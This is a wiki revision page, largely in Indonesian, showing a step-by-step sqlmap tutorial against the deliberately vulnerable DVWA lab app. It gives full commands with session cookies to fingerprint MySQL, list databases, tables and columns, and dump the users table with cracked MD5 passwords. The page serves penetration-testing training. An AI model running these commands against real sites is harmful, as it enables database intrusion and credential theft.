Difference between revisions of "DVWA: Exploit menggunakan sqlmap"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/ Owning the Database with SQLMap 24 Nov SQLMap is a tool that is being used by penetration testers ...)
 
 
(7 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/
 
Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/
  
 +
URL DVWA yang di serang
  
 +
http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#
  
Owning the Database with SQLMap
+
==Enumerating database (-f)==
24 Nov
 
  
SQLMap is a tool that is being used by penetration testers when they want to identify and exploit SQL injection vulnerabilities in web application engagements.SQLmap is very effective and provides many capabilities to the pen testers by helping them to execute queries automatically in the database in order to enumerate and to extract data from it.In this article we will see how we can use the sqlmap in order to exploit the SQL injection vulnerability on the DVWA (Damn Vulnerable Web Application).
+
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f
  
In order for the sqlmap to do the job correctly we need to specify some parameters.First of all we need to provide the exact URL that we want to test.The parameter in the sqlmap that must be used is the -u.So we have to copy from the web application the URL that we are going to test and to paste it in the sqlmap.In this example the URL that we have to take is the following:
+
Hasilnya kira-kira
  
http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
+
[09:38:21] [INFO] executing MySQL comment injection fingerprint
 +
web server operating system: Linux Ubuntu 16.04 (xenial)
 +
web application technology: Apache 2.4.18
 +
back-end DBMS: active fingerprint: MySQL >= 5.5.0
 +
                comment injection fingerprint: MySQL 5.7.11
 +
                html error message fingerprint: MySQL
  
Then we need to specify the cookie.We use this option in cases where the web application requires authentication like DVWA.So we will take the cookie that the application issued to us and we will put it on the sqlmap as well.We can capture the cookie by using any web application proxy like Burp.We will also put the –dbs parameter which will discover the databases that are running:
 
  
Starting the SQL Injection tests
+
==Fingerprinting database (-b)==
  
   
+
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b
  
Now lets see what was the result of these tests:
+
Hasilnya kira-kira
  
Enumerating the databases
+
[09:41:30] [WARNING] reflective value(s) found and filtering out
 +
web server operating system: Linux Ubuntu 16.04 (xenial)
 +
web application technology: Apache 2.4.18
 +
back-end DBMS operating system: Linux Ubuntu
 +
back-end DBMS: MySQL 5
 +
banner:    '5.7.11-0ubuntu6'
  
+
==List databases (--dbs)==
  
So the sqlmap discovered that the database that is running from behind the application is MySQL,the operating system,the web application technology,the version of MySQL and of course the number and the database names that exists.So with one command we already obtained a lot of information.The next command that we should use is to try to fingerprint the database in order to know the exact version.The parameter -f in sqlmap will give us the following result:
+
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs
  
Command:
+
Hasilnya kira-kira
  
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=3863bf835d223c43ce113c2d6da4521e; security=low” -f
+
[09:48:29] [INFO] the back-end DBMS is MySQL
 +
web server operating system: Linux Ubuntu 16.04 (xenial)
 +
web application technology: Apache 2.4.18
 +
back-end DBMS: MySQL 5
 +
[09:48:29] [INFO] fetching database names
 +
available databases [5]:
 +
[*] dvwa
 +
[*] information_schema
 +
[*] mysql
 +
[*] performance_schema
 +
[*] sys
  
Fingerprinting the database
 
  
+
==Cek tables di Database (-D namadatabase --tables)==
  
Knowing the exact version of the database will allow us to search for any common vulnerabilities that are might affect the database.The version of the database can be retrieved also and from the banner with the parameter -b.
+
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables
  
Retrieving the database banner
+
Hasilnya kira-kira
  
   
+
  09:50:45] [INFO] the back-end DBMS is MySQL
 +
web server operating system: Linux Ubuntu 16.04 (xenial)
 +
web application technology: Apache 2.4.18
 +
back-end DBMS: MySQL 5
 +
[09:50:45] [INFO] fetching tables for database: 'dvwa'
 +
Database: dvwa
 +
[2 tables]
 +
+-----------+
 +
| guestbook |
 +
| users    |
 +
+-----------+
  
So we will give the sqlmap the necessary parameters in order to discover the following:
+
==Lihat struktur data sebuah tabel (-T namatabel --columns)==
  
    The current user
+
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns
    The hostname
 
    If the current user is dba
 
    The current database
 
  
Command:
+
Hasilnya kira-kira
  
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –current-user –is-dba –current-db –hostname
+
[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa'
 +
Database: dvwa
 +
Table: users
 +
[8 columns]
 +
+--------------+-------------+
 +
| Column      | Type        |
 +
+--------------+-------------+
 +
| user         | varchar(15) |
 +
| avatar      | varchar(70) |
 +
| failed_login | int(3)      |
 +
| first_name  | varchar(15) |
 +
| last_login  | timestamp  |
 +
| last_name    | varchar(15) |
 +
| password    | varchar(32) |
 +
| user_id      | int(6)      |
 +
+--------------+-------------+
  
Obtaining the current user,current db,hostname and if the current user is dba
+
==Dump Password (-C password --dump)==
  
   
+
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump
  
As we can see from the image above we have obtained successfully the information that we asked.Now we need to find the users and their password hashes as well as and their privileges and roles that they have on the database.This is very important because we can use this kind of information to access the database directly in case that we can crack the hashes.SQLMap provides this functionality as well but in our case SQLMap discovered that for the accounts root,guest and debian-sys-maint no password has set and the root account has administrative privileges.
 
  
Command:
+
Hasilnya kira-kira,
  
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –users –passwords –privileges –roles
 
 
Discover database users and hashes
 
  
 +
Database: dvwa
 +
Table: users
 +
[5 entries]
 +
+---------------------------------------------+
 +
| password                                    |
 +
+---------------------------------------------+
 +
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
 +
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
 +
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
 +
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
 +
| e99a18c428cb38d5f260853678922e03 (abc123)  |
 +
+---------------------------------------------+
 
   
 
   
 +
[09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'
  
Discover Privileges and Roles
 
  
+
Atau yang lebih lengkap dapat menggunakan perintah
  
At this point we can say that the database is ours as we have all the database accounts in our disposal and the knowledge that these accounts are running with DBA privileges.However we would like also to own and the application so now we will focus on that.In order to achieve this we will need to extract data from the dvwa database.The sqlmap with the –tables parameter can enumerate the tables of all the databases that exist.
+
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa -T users --dump
  
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
+
Hasilnya kira-kira,
–cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –tables
+
Database: dvwa
 
+
Table: users
Database tables
+
[5 entries]
 
+
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
   
+
| user_id | avatar                                                  | user    | password                                    | last_name | first_name | last_login          | failed_login |
 
+
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
The dvwa database as we can see from the above output has only two tables:the guestbook and the users.We will try to enumerate the columns of these tables with the parameter –columns in the sqlmap.
+
| 1      | http://192.168.0.100/DVWA-1.9/hackable/users/admin.jpg  | admin  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin    | admin      | 2017-04-17 19:15:11 | 0            |
 
+
  | 2      | http://192.168.0.100/DVWA-1.9/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  | Brown    | Gordon    | 2017-04-17 19:15:11 | 0            |
Command:
+
| 3      | http://192.168.0.100/DVWA-1.9/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack      | 2017-04-17 19:15:11 | 0            |
 
+
  | 4      | http://192.168.0.100/DVWA-1.9/hackable/users/pablo.jpg  | pablo  | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso  | Pablo      | 2017-04-17 19:15:11 | 0            |
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
+
| 5      | http://192.168.0.100/DVWA-1.9/hackable/users/smithy.jpg  | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith    | Bob        | 2017-04-17 19:15:11 | 0            |
–cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –columns
+
  +---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
 
 
Obtaining the columns
 
 
 
   
 
 
 
The interesting table is the users because as we can see from the screenshot it has a column with the name password which may contain password hashes or even better passwords in clear text format.So lets see what kind of data the columns of these two tables are containing.
 
 
 
Command:
 
 
 
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –dump
 
 
 
Guestbook – Tables Entries
 
 
 
   
 
 
 
Cracking hashes in table users
 
 
 
   
 
  
As we can see from the image above sqlmap discovered password hashes on the column password and cracked them successfully by using a dictionary attack.Now we have and the passwords along with the usernames of the DVWA users which means that the database and the application have been compromised completely.
+
Seperti yang bisa kita lihat dari gambar di atas sqlmap berhasil menghack password hash pada kolom password dan berhasil memecahkannya dengan menggunakan dictionary attack. Sekarang kita punya dan password bersama dengan username dari pengguna DVWA yang berarti database dan aplikasi tersebut telah jebol sepenuhnya.
  
Conclusion
+
==Penutup==
  
In this tutorial we saw how effective is the sqlmap tool when we have to identify and exploit SQL injection vulnerabilities.Of course the proper way to exploit the SQL Injection vulnerability is manually.However in many penetration tests due to time constraints the use of sqlmap is necessary.
+
Dalam tutorial ini kita melihat seberapa efektif alat sqlmap ketika kita harus mengidentifikasi dan memanfaatkan kerentanan injeksi SQL. Tentu saja cara yang tepat untuk memanfaatkan kerentanan SQL Injection secara manual. Namun dalam banyak tes penetrasi karena kendala waktu penggunaan sqlmap adalah perlu.
  
Specifically in this case sqlmap managed to enumerate the database successfully and to extract data from the database tables very fast.Of course it has many more capabilities like that it can check for the existence of WAF (Web Application Firewall),IDS and IPS as well as that it can execute operating systems commands.For all these reasons this tool must be in the toolkit of every penetration tester.
+
Khususnya dalam hal ini sqlmap berhasil mengemerasi database dengan sukses dan mengekstrak data dari tabel database dengan sangat cepat. Tentu saja sqlmap memiliki lebih banyak kemampuan seperti itu yang bisa mengecek adanya WAF (Web Application Firewall), IDS dan IPS. Karena bisa menjalankan perintah sistem operasi. Untuk semua alasan ini alat ini harus berada di toolkit setiap penetrasi tester.
  
  

Latest revision as of 10:24, 3 May 2017

Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/

URL DVWA yang di serang

http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#

Enumerating database (-f)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f 

Hasilnya kira-kira

[09:38:21] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               comment injection fingerprint: MySQL 5.7.11
               html error message fingerprint: MySQL


Fingerprinting database (-b)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b

Hasilnya kira-kira

[09:41:30] [WARNING] reflective value(s) found and filtering out
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.7.11-0ubuntu6'

List databases (--dbs)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs

Hasilnya kira-kira

[09:48:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[09:48:29] [INFO] fetching database names
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys


Cek tables di Database (-D namadatabase --tables)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables

Hasilnya kira-kira

09:50:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[09:50:45] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Lihat struktur data sebuah tabel (-T namatabel --columns)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns

Hasilnya kira-kira

[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

Dump Password (-C password --dump)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump


Hasilnya kira-kira,


Database: dvwa
Table: users
[5 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
+---------------------------------------------+

[09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'


Atau yang lebih lengkap dapat menggunakan perintah

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa -T users --dump
Hasilnya kira-kira,
Database: dvwa
Table: users
[5 entries]
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar                                                   | user    | password                                    | last_name | first_name | last_login          | failed_login |
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | http://192.168.0.100/DVWA-1.9/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2017-04-17 19:15:11 | 0            |
| 2       | http://192.168.0.100/DVWA-1.9/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2017-04-17 19:15:11 | 0            |
| 3       | http://192.168.0.100/DVWA-1.9/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2017-04-17 19:15:11 | 0            |
| 4       | http://192.168.0.100/DVWA-1.9/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2017-04-17 19:15:11 | 0            |
| 5       | http://192.168.0.100/DVWA-1.9/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2017-04-17 19:15:11 | 0            |
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+

Seperti yang bisa kita lihat dari gambar di atas sqlmap berhasil menghack password hash pada kolom password dan berhasil memecahkannya dengan menggunakan dictionary attack. Sekarang kita punya dan password bersama dengan username dari pengguna DVWA yang berarti database dan aplikasi tersebut telah jebol sepenuhnya.

Penutup

Dalam tutorial ini kita melihat seberapa efektif alat sqlmap ketika kita harus mengidentifikasi dan memanfaatkan kerentanan injeksi SQL. Tentu saja cara yang tepat untuk memanfaatkan kerentanan SQL Injection secara manual. Namun dalam banyak tes penetrasi karena kendala waktu penggunaan sqlmap adalah perlu.

Khususnya dalam hal ini sqlmap berhasil mengemerasi database dengan sukses dan mengekstrak data dari tabel database dengan sangat cepat. Tentu saja sqlmap memiliki lebih banyak kemampuan seperti itu yang bisa mengecek adanya WAF (Web Application Firewall), IDS dan IPS. Karena bisa menjalankan perintah sistem operasi. Untuk semua alasan ini alat ini harus berada di toolkit setiap penetrasi tester.


Referensi